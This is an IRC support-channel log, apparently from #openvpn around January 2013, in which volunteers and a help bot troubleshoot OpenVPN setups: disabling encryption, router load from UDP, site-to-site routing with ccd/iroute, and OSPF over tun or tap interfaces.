01:16 <+pekster> Wow, an 11 second RTO :P
01:16 <@krzee> it will just get in the way =]
01:16 <@krzee> lol
01:16 < soulcito> krzee just need to get a tunnel
01:17 < soulcito> do you know where in ubuntu are the openvpn profiles stored?
01:17 < soulcito> cant find them anywhere
01:17 <@krzee> ya consider gre tunnels, its the tunnel stuff without the encryption
01:17 < soulcito> ive been just configuring the network manager gui
01:17 <@krzee> nooooo
01:17 <@krzee> !netman
01:17 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list
01:17 <@krzee> !ubuntu
01:17 <@vpnHelper> "ubuntu" is dont use network manager!
01:17 <+pekster> 'man ip' or 'ip tunnel help' for basic tunneling
01:18 < Wintereise> krzee smells
01:18 < soulcito> cant change to gre
01:18 < Wintereise> =)
01:18 < Wintereise> Sup
01:18 < soulcito> i need to connect a openvpn server
01:18 < soulcito> no other option
01:18 < soulcito> its a service
01:18 <@krzee> a vpn service without encryption?
01:18 <@krzee> your config MUST match theirs
01:18 < Wintereise> GRE is enabled by default on most linux configs, btw.
01:18 <@krzee> you cant opt to disable encryption if they arent doing the same
01:19 < soulcito> krzee: just need a exit point in US
01:19 <@krzee> you should have been given a config by them, drop that in /etc/openvpn with .conf
01:19 <@krzee> soulcito, that does not change what i said
01:19 <@krzee> if your provider uses encryption, you must...
01:19 < soulcito> the provider let me disable it
01:19 <@krzee> !provider
01:19 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team.
01:20 <@krzee> they should have given you your config file
01:20 < soulcito> its a webpage with just some option :)
01:20 <@krzee> you will not be able to guess all their config
01:20 < soulcito> i want to make it the lighter possible because my router is dying because of the encryption load
01:20 <@krzee> your router will be running openvpn?
01:21 < soulcito> no
01:21 < soulcito> its a ubuntu behind
01:21 <@krzee> then it wont know about the encryption
01:21 < soulcito> cant read the encryption but it could be trying to inspect it
01:21 <@krzee> unless you're doing deep packet inspection on your router
01:21 < soulcito> it consumes cpu
01:21 < soulcito> inspect/track
01:21 <@krzee> thats dumb, why would it be doing that?
01:22 < Wintereise> nf_conntrack is disable-able even on most mips kernels, if you didn't know.
01:22 < soulcito> well if its udp it need to identify its a connection and let the return packet in
01:22 <@krzee> ^ that wouldnt be special for encrypted packets
01:22 < Wintereise> And what krzee said, your router shouldn't even know what the packet is
01:22 <@krzee> what hes saying would be some deep packet inspection
01:22 < Wintereise> Its job is to send them and receive them, encryption doesn't matter
01:22 < soulcito> maybe not deep packet inspection
01:22 <@krzee> in which case, lol at you for not disabling that on your own vpn
01:22 < Wintereise> krzee, yeah, does sound like DPI
01:23 < soulcito> but at least need to track the connection to let the return packet in
01:23 <@krzee> you mean nat tracking, once again it wont know if its encrypted payload or not
01:23 <@krzee> its just data
01:23 <+pekster> soulcito: Unless you're running OpenVPN on your router, a residential router isn't going to be suffering a higher load to support a client behind it using openvpn with encryption versus without it
01:23 < Wintereise> Sounds like something else is wrong, tbqh
01:23 <+pekster> I can assure you that you are not running a DPI/IDS system without knowing what that is, so I'm pretty sure you don't have one ;)
01:24 < soulcito> well im trying to discard, it could be other option enabled in the ip packet that make my router die
01:24 < soulcito> but in fact it dies
01:24 <@krzee> pekster, ++
01:24 < soulcito> oh come on
01:24 < soulcito> i know some stuff
01:24 < soulcito> i am network engineer -_-
01:24 <@krzee> oh boy
01:24 * krzee runs
01:24 < Wintereise> lol
01:24 < Wintereise> now now
01:25 < soulcito> lol
01:25 < Wintereise> What kind of router is this?
01:25 <+pekster> Yet you don't know if your router has DPI features? What OSI layer do you suspect your DPI is looking at? L4? L7? Ugh
01:25 < Wintereise> I really suspect any router that has DPI features would be dying from simple vpn packets too
01:25 < Wintereise> So lol
01:25 < soulcito> i was just doing a simple question... dont need to take to degenerate it O_O
01:25 <+pekster> tl;dr: your router doesn't give a crap if you have an unencrypted VPN, encrypted VPN, youtube video, or IRC session
01:26 <@krzee> your answer was given in the first response
01:26 <+pekster> soulcito: If you control both the server and the client and are able to modify encryption options at *BOTH* ends of your VPN peering, look at the --cipher and --alg options in the manpage
01:26 <@krzee> we just felt like you could benefit from additional info
01:26 < soulcito> yeah thank you
01:27 <+pekster> Be aware that all the data running across the link is fully visible to anyone on the wire (on the router path over the Internet, and possibly anyone in their L2 (Ethernet) network as well)
01:27 < soulcito> but you were trying to say I dont know what i am talking about
01:27 <@krzee> right^, and if you dont control the server you shouldnt be configuring it yourself. and you should never configure using network manager
01:27 <@krzee> if you wish to import a working config to network manager to use, thats fine
01:27 <+pekster> When you were talking about your router dying/crashing/locking-up when you use an encrypted VPN, that sounds like BS. And I do networking as a profession
01:27 <@krzee> soulcito, well you did demonstrate that while we talked about your router
01:28 <@krzee> and as a network engineer you get a quicker lashing for it l[
01:28 <@krzee> ;]
01:28 < soulcito> well i am just checking why it is dying
01:28 < soulcito> not sure what it fails to check
01:28 <+pekster> From a single UDP stream?
01:28 < soulcito> because I dont have the option to troubleshoot in it
01:28 < soulcito> i think it doesnt have
01:28 <@krzee> if theres ANY single udp stream killing it, i would throw it away immediately
01:28 <+pekster> Spend $30 on a router that can run OpenWRT and manage your own network ;)
01:29 <@krzee> ^^^
01:29 < soulcito> well every router has its limitations depending on the type of traffic
01:29 < soulcito> i have seen a lot of cases
01:29 <@krzee> lol
01:29 <@krzee> seen a lot of them die from a single simple udp stream?
01:29 <@krzee> cause i would call that a fatal bug
01:30 <@krzee> and openvpn has never been known to trigger any neat nukes in routers, although ild consider that awesome
01:30 * krzee ddos'es you with openvpn clients!
01:30 < soulcito> well it recognize it as a lot of connections, the table could go full and run of memory and die
01:30 <@krzee> nope
01:30 <+pekster> No, see, OpenVPN operates over a SINGLE port
01:30 <+pekster> Just one. Ever.
01:31 < soulcito> it could be the same port but different connections
01:31 <@krzee> negative ghostrider
01:31 <@krzee> unless your stuff reeeeeeeeeally sucks in special ways
01:32 <@krzee> in which case, see the above suggestion about spending $30 and doing it like a network engineer
01:32 < soulcito> oh come on
01:32 <@krzee> btw, openwrt would be able to handle the vpn stuff too
01:32 < soulcito> you could have a lot of users connecting to same web port
01:32 < soulcito> and they are different connections
01:32 <@krzee> so you wouldnt even need it on the lan machine(s)
01:32 < soulcito> even its a single user
01:32 <+pekster> But you are a CLIENT, not the SERVER
01:32 < soulcito> i know
01:33 < soulcito> but the router need to identify connections and save them
01:33 < soulcito> for the return
01:33 <@krzee> the server may have different connections, 1 per client
01:33 < soulcito> in udp is harder
01:33 <@krzee> but the client will only ever have a single connection, period
01:33 <+pekster> No, it's easier because it's a stream connection, not a stateful based connection
01:33 <+pekster> UDP is a "simpler" protocol. Which you should know as a "network engineer"
01:33 <@krzee> right, and i suggest not attempting to keepstate on udp if that is an option
01:34 <+pekster> UDP is stateless. Modern routers track the "state" of it as a stream based on a time limit, commonly 2-3 minutes for an established stream
01:34 <@krzee> although it can be done, its a hack and ugly as hell often times
01:34 <+pekster> So, your router is using around 100 bytes or so to track the connection, and a negligible amount of CPU traffic to handle the NAT. If that "breaks" it, buy a non-shitty piece of equipment. That's not an OpenVPN problem
01:34 < soulcito> pekster: dont need to be a troll
01:34 <@krzee> ehh?
01:34 <@krzee> pekster is helping you
01:35 <+pekster> I'm providing all sorts of useful information if you'd like to read what I have to say
01:35 < soulcito> "Which you should know as a "network engineer""
01:35 < soulcito> that was offensive
01:35 <@krzee> you should!
01:36 < soulcito> what?
01:36 <+pekster> If that was offensive that wasn't the intent. I'm refuting your claim that UDP is more taxing on modern stateful NAT firewalls in embedded routers, which is completely false. Take away from that what you want.
01:36 < soulcito> udp is simpler?
01:36 <@krzee> you're the one who declared your network engineer status
01:36 < soulcito> come on, for a router could be headache
01:36 <@krzee> we're attempting to teach you stuff that we feel you should already know based on that declaration
01:36 <@krzee> which is fine, but you're fighting accepting the information
01:36 <+pekster> Yes. UDP is MUCH easier to track since you don't need to worry about tracking syn-received, ack-sent, established tcp, fin, fin-wait, and fin-ack states
01:37 <+pekster> TCP is stateful, which means you not only need to track the connection state (in stateful firewalls,) but you ALSO need to track what condition the tracked connection is in. UDP is just a raw stream of data with no "start" or "end", and thus no worry about what condition the stream is in
01:37 <+pekster> !tcpip
01:37 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
01:37 <@krzee> soulcito, what you said is only if its attempting to do udp state tracking, which it should NOT be doing and you should disable if you somehow did enable it.
01:38 < soulcito> one example, dont you think it could be difficult for a router to identify if its just a unidirectional udp?...
01:38 <@krzee> no
01:38 <@krzee> its not
01:38 <@krzee> its a 2 way stream
01:38 <@krzee> and even if it were not, no
01:38 < soulcito> but it needs to wait for the return, time in save the connection in the memory
01:38 <+pekster> Well, DHT is sometimes "unidirectional" in which case the entry is dropped from a stateful firewall system within about 30-60 seconds
01:38 <@krzee> exactly what do you think its trying to identify dude?
01:39 <@krzee> the encryption is all payload, why would your layer4 device be worrying about the layer7 data?
01:39 < soulcito> it could have other checks to confirm but dont know if a udp is unidirectional without waiting for the return
01:39 <+pekster> stateful tracking isn't on a per-packet basis; it's on a per-connection basis, of which OpenVPN uses one.
01:40 < soulcito> pekster: ok 30-60 seconds its a LOT, multiple for every udp stream could be generated
01:40 <@krzee> what router are you using anyways?
01:40 < soulcito> krzee: dunno, im just trying to discard, if it is not related to the encryption 01:40 < soulcito> its a cisco cablemodem 01:40 <+pekster> soulcito: I run bittorrent through a router with 16M of RAM. My statefull firewall maintains around 1500 to 2000 known states at any given point in time, and this is a fiarly cheap, low-end router by todays standards 01:41 <@krzee> your cisco cablemodem doesnt do any dpi, therefor i just ruled it out for you 01:41 <@krzee> but go ahead and test all ya like ;] 01:42 <@krzee> if you dont learn by listening, maybe experience will help 01:42 < soulcito> -_- 01:42 <@krzee> in case the answer was lost under all the talk: 01:42 <@krzee> !noenc 01:42 <@vpnHelper> "noenc" is (#1) if you're going to disable encryption, you might as well build a GRE tunnel or (#2) but you would use cipher none 01:43 <@krzee> #2 01:43 < soulcito> yeah i know 01:43 < soulcito> then the network manager problem appeared 01:43 < soulcito> :) 01:43 <@krzee> !netman 01:43 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 01:43 <@krzee> !ubuntu 01:43 <@vpnHelper> "ubuntu" is dont use network manager! 01:43 <@krzee> netman *is* a problem :-p 01:44 <@krzee> drop your config in /etc/openvpn named .conf 01:44 < chrisb> it has been years since i've owned a non-consumer router(cisco)...what's a good one? 01:45 <@krzee> i expect you wont guess your config right, but i wont be able to help with that since you dont run your server 01:45 < soulcito> pekster: most of the "fairly cheap" routers dies after 3-4 days of doing 4-5 concurrents torrents 01:45 < soulcito> pekster: memory gets full of garbage 01:45 <+pekster> "memory gets full of garbage" ?? 
01:46 <@krzee> wow, what complete crap 01:46 <@krzee> spend the $30 for an openwrt able router 01:46 <@krzee> lol 01:47 <+pekster> I'm running an Asus WL-520gu router, a fairly generic OpenWRT-supported system with 4M flash, 16M RAM, 5 100 Base-T ports, and I support about 2 dozen FOSS torrents and around 2k connections overnight during my higher upload seeding time 01:47 <+pekster> I think it cost me about $30 after rebate, and that was 2+ years ago 01:47 <@krzee> when did it last reboot pekster 01:47 <@krzee> :D 01:48 <+pekster> About a month ago, and that was because I made a mistake and locked myself out with a "quick" rulechange that had a typo in my fw rules :P 01:48 < soulcito> just lost a linksys trying to conver to dd-wrt :-) 01:48 <+pekster> I used a similar product at my last job (Asus WL-500gPv2) and saw them stay running for months. I think the longest uptime was 200+ days before that person was fired 01:48 <@krzee> bricking routers doesnt sound very network-engineerish, did you develop the rom in question or something? :D 01:49 <+pekster> OpenWRT is more friendly to those looking to tinker with the networking, IMO, especially if you don't care about the WebUI frontend 01:49 <+pekster> Plus their build system is better ;) 01:49 <@krzee> my ddwrt doesnt even have a web frontend 01:50 <@krzee> and their buildsystem is lazy too once you write shell script wrappers! :D 01:50 < soulcito> krzee: it was just a PoC :) 01:50 <+pekster> 4M of flash on my home router, I don't have *room* for LuCI :D 01:50 < Wintereise> I have a rtn16 01:50 <@krzee> pekster, exactly! 01:50 * Wintereise waits to be bashed 01:50 <@krzee> bashed? 
01:50 <@krzee> a quick google reveals it looks nice 01:51 <@krzee> holey shittons of ram 01:51 <@krzee> and flash too 01:51 < Wintereise> It's great, yeah 01:51 * krzee steals Wintereise's router 01:51 < Wintereise> nou :< 01:52 * soulcito has a CRS-3/16 :P 01:52 < soulcito> lol 01:52 <@krzee> my fav router is my freebsd server tho 01:52 <@krzee> with 3 nics and 4 tunnel devices 01:52 <@krzee> pf to keep the packets going where they should ;] 01:52 < Wintereise> http://www.asus.com/websites/global/products/WAa6AQFncrceRBEo/super_speed.jpg 01:52 < Wintereise> That is what tempted me 01:53 <@krzee> and multiple FIBS for the multiple uplink routing 01:53 <+pekster> I'll spend more than $30 on a router when ISPs offer real connection speeds like fiber to the door 01:53 <@krzee> mmmm fiber 01:53 <+pekster> US has 2nd world Internet connectivity :( 01:53 <@krzee> im in 3rd world 01:53 <@krzee> ild kill for some 2nd world 01:54 < soulcito> where are you from? 01:54 <@krzee> que vivo en el caribe 01:54 < soulcito> donde 01:54 <@krzee> vi que tu hablas espanol tambien 01:54 < soulcito> si 01:54 < soulcito> (-: 01:55 <@krzee> visitaba lima, es hermosa 01:56 < soulcito> lo mejor es su comida 01:56 < soulcito> eres de dominicana, pr? 01:56 <@krzee> im from california 01:56 < soulcito> lol 01:56 <@krzee> headed back soon for a visit 01:57 < Wintereise> I want a rtn66u or something 01:57 < Wintereise> It looks so amazing 01:57 <@krzee> !krzee 01:57 <@vpnHelper> "krzee" is (#1) krzee says happy 4/20 or (#2) http://www.ircpimps.org/pics/krzee/blunt.jpg 01:57 <@krzee> ^ me 01:58 < soulcito> what is that ? O_o 01:58 <@krzee> a blunt 01:59 <+pekster> RT-N66U has really ugly binary driver blobs 02:00 < Wintereise> It can't run openwrt yet? 
02:00 < Wintereise> lame
02:00 <+pekster> https://forum.openwrt.org/viewtopic.php?id=33812
02:00 <@vpnHelper> Title: OpenWRT support for the ASUS RT-N66U (Page 1) — General Discussion — OpenWrt (at forum.openwrt.org)
02:01 <@krzee> supported by tomatousb and dd-wrt but not openwrt
02:01 < Wintereise> talk about sad
02:01 <@krzee> meh same shit, i don't touch the web gui anyways
02:01 <+pekster> My Asus unit only supports wifi with a 2.4 kernel ;) (thankfully I didn't buy it for wifi, and I'm running a new-ish 2.6 kernel without wifi, because Broadcom sucks)
02:01 <@krzee> broadcrap
02:01 <@krzee> i feel the same way about realtek (realcrap)
02:02 <@krzee> for their ethernet cards tho, their wiki is fine
02:02 < Wintereise> Both are equally shit
02:02 <+pekster> Depends on the chipset; there are a small handful of RTL chipsets that are open-enough to remain supported for pretty much any kernel >=2.2
02:03 <+pekster> No clue why open hardware isn't more in-demand :(
02:03 < Wintereise> Linux RT-N66U 2.6.22.19 #1 Tue Nov 22 10:29:48 CST 2011 mips GNU/Linux
02:03 < Wintereise> yay for ancient
02:04 <+pekster> And that, is why I demand devices that don't require binary blobs to run :(
02:04 < Wintereise> system type : Broadcom BCM5300 chip rev 1 pkg 0
02:04 < Wintereise> not bad
02:04 <+pekster> "But, but the label said OpenSource and dd-WRT supported"
02:04 <+pekster> Right
02:05 <+pekster> Read: we created a build using some arbitrary dd-wrt version and built the vendor's proprietary binary network blob for that kernel version specifically
02:05 <@krzee> haha
02:05 <+pekster> I'm not ripping on dd-wrt (even though I like OpenWRT more,) but the mfgr's choice to not really "support" the product they built
02:06 < Wintereise> ASUS Support hasn't answered the bug report I sent in via vip.asus.com in 10 days
02:06 < Wintereise> lol
02:06 < Wintereise> VIP VIP VIPPAY
02:06 < Wintereise> I have a z77 board that classifies me as 'vip' too
02:07 < Wintereise> And same case there
02:07 < Wintereise> Ultra slow support
02:07 < Wintereise> They eventually do reply
02:09 < soulcito> oh i found the damn profiles :-)
02:10 < soulcito> /etc/NetworkManager/system-connections/
02:20 < soulcito> silence~~
09:01 <+s7r> what kind of certs does openvpn use? X509 ?
09:17 <+dvl> s7r: I think so. I can point here, I just wrote this. Does that help? http://dan.langille.org/2013/01/03/ssl-admin/
09:17 <+dvl> $ openssl x509 -text -in active/ca.crt
09:17 <+dvl> etc? so yeah, I think so.
09:21 <+s7r> yup
09:21 <+s7r> that is correct dvl
09:21 <+s7r> nice documentation you have written here
09:21 <+s7r> you use freebsd ?
09:21 <+dvl> Thank you. Yes.
09:22 <+dvl> I usually write at http://www.freebsddiary.org/ but have taken to WordPress. I'm converting the Diary over.
09:22 <@vpnHelper> Title: The FreeBSD Diary (at www.freebsddiary.org)
09:32 <+s7r> nice
09:32 <+s7r> to have u here
09:35 <+dvl> thanks
09:54 <+s7r> l
12:07 <+s7r> dvl: u there?
12:26 < DBordello> !goal
12:26 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
12:37 < soulse> !sex
12:37 < soulse> lol
--- Day changed Mon Jan 07 2013
03:03 < IT> hey guys
03:04 < IT> what do i need to change so i can use samba over two routed offices, in the current config? http://pastebin.com/TPHCCUdn
03:08 <+pekster> You are pushing the wrong subnet to the client, and you don't have a ccd directory with an iroute for the client's network
03:08 <+pekster> !serverlan
03:08 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
03:08 <+pekster> !clientlan
03:08 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
03:08 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
03:08 <+pekster> Pick one of those to work on at a time and follow the instructions
03:08 < IT> ty
03:10 < IT> !iroute
03:10 <@vpnHelper> "iroute" is does not bypass or alter the kernel's routing table, it allows openvpn to know it should handle the routing when the kernel points to it but the network is not one that openvpn knows about. This is only needed when connecting a LAN which is behind a client, and therefore belongs in a ccd entry. Also see !route and !ccd
04:07 < IT> i changed the config http://pastebin.com/NimZCLEC but i can't access the other subnet http://pastebin.com/NimZCLEC what did i miss?
04:16 < yeshello1here> i have a weird issue, i've got a bridged server and a number of clients attached, when trying to communicate client to client i see arps hitting the bridge on the server, but they never appear to go back out of the tap device
04:16 < yeshello1here> i know i could enable client-to-client, but i wish to firewall these clients from each other to some extent
04:17 < yeshello1here> is this a limitation i'm unaware of or have i screwed something up? i can pastebin the configs if needed but they're little more than howto examples
04:20 < yeshello1here> for extra reference, the server can happily ping and get arp replies from all clients without issue, it's just client to client that seems to be broken and i can't easily see why
06:14 < IT> is anybody here willing to help me setup an office-2-office connection for a moderate fee?
07:43 < yeshello1here> IT: i'm sure many people will help you set it up for no charge
07:44 < IT> i have run out of ideas
07:44 < yeshello1here> IT: openvpn is pretty easy to set up! what are you trying to do?
07:45 < IT> i'm trying to setup an office-2-office connection with different subnets
07:45 < yeshello1here> ok so you want each office to be able to access the other office over a vpn?
07:45 < IT> yes
07:46 < IT> i got openvpn running and connecting but i can't access the other network pc's
07:46 < yeshello1here> are you running openvpn on the default gateway for your network?
07:46 < IT> yes, on every office
07:48 < yeshello1here> IT: sorry, just dealing with my own problem there
07:52 < yeshello1here> IT: it sounds like a default gateway issue anyhow, if you detail what debugging you've done i'll help a bit more in a minute
07:52 < yeshello1here> just got an OSPF issue to fix :(
07:54 <@ecrist> good morning
07:55 <+rob0> IT, what is your budget, and what OSs are involved?
07:55 < IT> atm i'm not sure if i'm using the right configuration for this http://pastebin.com/RQnHWwxL
07:56 < IT> @rob0t, check PM
07:57 < yeshello1here> morning ecrist
08:01 < fu_fu> Hello, G'morning
08:01 < yeshello1here> so i want to run a tap openvpn
08:01 < yeshello1here> but i also want my clients to get /30s
08:01 < yeshello1here> as i care only about multicast availability on the link
08:01 < yeshello1here> (so i can run ospf over it!)
08:02 <@ecrist> why do you want to use tap, then?
08:02 < yeshello1here> as i understand multicast on tun doesn't work?
08:02 <@ecrist> that doesn't make sense
08:02 < yeshello1here> i'm sure i tested it originally but that was like 18 months ago
08:03 < yeshello1here> so openvpn should support multicast over tuns? cause if so i'll just switch to that right now
08:03 <@ecrist> i believe so, yes
08:03 < yeshello1here> is there an easy way to assign them a specific tun # too?
08:03 <@ecrist> tun devices won't support broadcast, but that's not related to multicast.
08:03 <@ecrist> !cd
08:03 <@ecrist> !ccd
08:04 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects.
08:04 <@ecrist> !static
08:04 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder
08:04 < yeshello1here> uh i meant the actual tun device, as i have two tun VPNs configured on a debian box
08:04 <@plaisthos> yeshello1here: you don't need multicast for ospf. You can statically configure neighbours ...
08:04 < yeshello1here> i'm just gonna go read up on configuration though to make sure i don't screw things up too badly
08:05 <@ecrist> yeshello1here: those two things vpnHelper just said will get you static IPs for your clients
08:05 < yeshello1here> plaisthos: in this use case we can't go with simple static configs
08:05 < yeshello1here> ecrist: static IPs don't matter, it's just the actual tun device number that i care about
08:05 < yeshello1here> thanks for all the help so far though
08:05 <@ecrist> yeshello1here: that's specific to linux, but you can specify a tun device number in the config
08:06 <@ecrist> --dev tun0
08:06 <@ecrist> --dev tun1
08:06 <@ecrist> etc
08:06 < yeshello1here> ok well i'll hope that works, doing some dangerous stuff at 2pm on a monday haha
08:09 <@ecrist> yeshello1here: no reason it shouldn't work.
08:10 < yeshello1here> ecrist: the issue is that one site is only connected via this currently badly configured VPN
08:11 < yeshello1here> it was haphazardly moved and set up and now needs careful attention
08:11 <@ecrist> well, that's not a problem with OpenVPN so much as it's your problem. :)
08:11 < IT> guys, any idea what i'm missing here http://pastebin.com/RQnHWwxL ?
08:12 <@ecrist> why do you think you're missing something?
08:15 < IT> i can't ping the other lan gw or machines
08:15 <@ecrist> do you see anything in your logs?
08:16 < IT> just this warning "WARNING: 'ifconfig' is present in remote config but missing in local config, remote='ifconfig 10.0.8.0 255.255.255.0'"
08:17 <@ecrist> !logs
08:17 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it and select Copy log text to clipboard or (#4) if you don't know how to find your logs, see !logfile
08:17 < IT> ok, sec
08:17 <@ecrist> IT: you have two servers and no clients?
08:17 <@ecrist> generally, the way this works is one is a server, the other is a client
08:18 <@ecrist> remove line 31
08:18 <@ecrist> remove line 29
08:18 <@ecrist> and 28
08:18 < IT> on server?
08:18 <@ecrist> and 33
08:19 <@ecrist> from your pastebin
08:19 < IT> ok
08:19 <@ecrist> (and effect those changes on the appropriate config)
08:20 < IT> if i do that i get Options error: Parameter ca_file can only be specified in TLS-mode, i.e. where --tls-server or --tls-client is also specified.
08:21 <@ecrist> remove tls-client and replace it with client
08:21 < IT> k
08:22 < IT> i removed them and i can ping the other vpn's interface 10.0.8.2
08:23 < IT> getting RwrWRwrWRwrWRwrWRwrWWRWRWRWR in the log while doing it
08:23 < IT> but that's as far as it goes
08:23 < IT> can't reach the gw or machines behind it
08:23 <@ecrist> please pastebin your logs
08:23 <@ecrist> verb set to 4 or higher
08:25 < IT> verb 5 -> server http://pastebin.com/1TpXhT20
08:25 < IT> -> client http://pastebin.com/c2mFHDY1
08:27 <@ecrist> from the client, are you able to ping 10.0.8.1?
08:28 <@ecrist> looks like the VPN came up without issue
08:28 <@ecrist> !goal
08:28 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
08:28 <@ecrist> afk a few
08:29 < fu_fu> question: is it possible to install additional w32-Tun/tap adapters on windows? likewise additional versions of openvpn?
08:29 < IT> @ecrist, yes i can ping 10.0.8.1 from the client
08:30 < yeshello1here> hmm ok so i reconfigured my VPN to tun, and OSPF is configured in point to point, but i ain't seeing it, i think cause the peer address doesn't respond, which is kinda odd
08:30 < IT> goal - I would like to access the lan behind the server and vice-versa
08:30 <@dazo> fu_fu: yes, there should be an addtap.bat file where you'll find the openvpn.exe file .... run that one to add another tap adapter
08:30 <@dazo> fu_fu: it should also be fairly well documented in man and howto pages, how to tell openvpn to use these different tap adapters too
08:32 < fu_fu> dazo nice, thanks, if I add the adapter and dev tun0, 1, 2; and install dif versions in dif dirs, then the service seems to get overwritten
08:34 <@dazo> fu_fu: the service stuff might be somewhat different, yes ... but running openvpn service with different versions of openvpn sounds like a very odd setup ... so then you need to hack it yourself
08:34 * dazo pulls up his normal disclaimer: dazo is not a Windows user
08:35 < fu_fu> lol, i am setting up on linux next
08:56 < yeshello1here> yeah ecrist i'm having some weird issues here
08:56 < yeshello1here> i think it's because the tunnel is set up between ex: .5 and .6
08:56 < yeshello1here> but the server only responds on .1
08:56 < yeshello1here> i'm gonna try with pool-linear
08:56 < yeshello1here> see what happens
08:58 < yeshello1here> that looks much better now
08:59 < yeshello1here> oh so close
08:59 < yeshello1here> i can see the peer but it doesn't get into a full state
09:03 < yeshello1here> yeah so the problem i guess is that openvpn handles its own internal routing for that
09:22 < yeshello1here> plaisthos / ecrist: i've now been told that in fact openvpn's internal routing table precludes using ospf in any way but p2p, the only other way around it i can see is if i could generate a bunch of /30 connections but using tap so i could run broadcast across it
09:23 < yeshello1here> however iptables-pool seems insistent on making one big network if i use tap, is there any way around this?
09:24 < IT> use tun ?
09:24 < yeshello1here> it won't work because the endpoint addresses do not match
09:24 < yeshello1here> (unless you use p2p)
09:24 < fu_fu> yeshello1here, you can firewall or accesslist, TAP is meant to make one big LAN, if you want to route, use TUN
09:25 < fu_fu> can you use p2p? why do you want TAP?
09:25 < yeshello1here> tun won't work because openvpn presents only its internal address for routing and so i can't run ospf across it unless both sides match
09:25 < yeshello1here> fu_fu: it would be less configuration and armache basically
09:25 < yeshello1here> cause i could just run broadcast across it and any clients connecting would be fine
09:25 < yeshello1here> instead of having to make individual VPNs for each potential endpoint
09:28 < fu_fu> interesting, are you on *nix or Win?
09:30 < yeshello1here> nix, i'm wondering about --topology
09:30 < yeshello1here> i don't think it'd work like i'm looking for really
09:30 < yeshello1here> i need to take a short break and go over this
09:31 < fu_fu> if you are using ospf you should be able to get away with using p2p. you will have more complete control of routing
09:31 < yeshello1here> yeah i'm just concerned about setting up 10+ tun devices and managing them all as nicely
09:31 < fu_fu> heh, ya, that's new to me
09:32 < yeshello1here> i assume i can still go with CA auth?
09:32 < yeshello1here> i bloody hope so!
09:32 < fu_fu> sure, no reason why not
09:53 <@ecrist> IT: your VPN is working, if you can ping 10.0.8.1
09:53 <@ecrist> now you need to push the proper routes
09:54 <@ecrist> yeshello1here: use tap, then.
09:54 <@ecrist> you can still use routed VPN (avoid bridge, if you can)
09:55 < yeshello1here> ecrist: tap always uses the subnet topology
09:55 < yeshello1here> which is the problem
09:55 < yeshello1here> as it causes errant ospf adjacencies
09:56 <@ecrist> see if this helps you at all: http://www.secure-computing.net/wiki/index.php/OpenVPN/RIPRouting
09:56 <@vpnHelper> Title: OpenVPN/RIPRouting - Secure Computing Wiki (at www.secure-computing.net)
09:56 < yeshello1here> ecrist: this is how i am now setting it up (telling a peon to set it up for me)
09:57 < yeshello1here> individual p2p links between the various machines
09:57 < yeshello1here> i'm quite happy with that solution really
09:57 < yeshello1here> ecrist: i have a more important (ie personal) issue to solve, i have a tap vpn bridged into br0, i am trying to communicate client to client without client-to-client set, from my reading of the documentation this should forward traffic on to the bridge interface
09:57 < yeshello1here> this seems to be happening, i see the ARP request from my machine
09:57 < yeshello1here> but
09:58 < yeshello1here> it never makes it to the client, so openvpn seems to be ignoring incoming arps for client addresses from the bridge or similar
09:58 <@ecrist> you won't be able to, without client-to-client
09:58 < yeshello1here> that seems rather dangerous?
09:58 <@ecrist> no
09:58 < yeshello1here> i want to have some measure of firewalling between clients
09:58 -!- dazo_afk is now known as dazo
09:58 <@ecrist> if you want clients to talk to each other, you need to enable client-to-client
09:58 <@ecrist> use a firewall, then
09:59 < yeshello1here> the documentation isn't very clear on that
09:59 < yeshello1here> how can i use a firewall, if the packets never leave openvpn? :)
09:59 <@ecrist> if you enable client-to-client, they do
09:59 < yeshello1here> wait, that's not what the documentation says
09:59 < yeshello1here> with client-to-client packets are routed internally within openvpn
09:59 < yeshello1here> and never hit the OS stack for firewalling
09:59 < yeshello1here> that means i have to tell my users to maintain their own security, which is pretty annoying compared
09:59 <@ecrist> have you tried it?
10:00 <@ecrist> iirc, there's an error in the docs
10:00 < yeshello1here> no i'm currently on the VPN so i can't kill it until later on
10:00 <@ecrist> that's hardly *my* problem. :P
10:00 < yeshello1here> i'll give it a go anyhow
10:00 <@ecrist> you could set up a test vpn
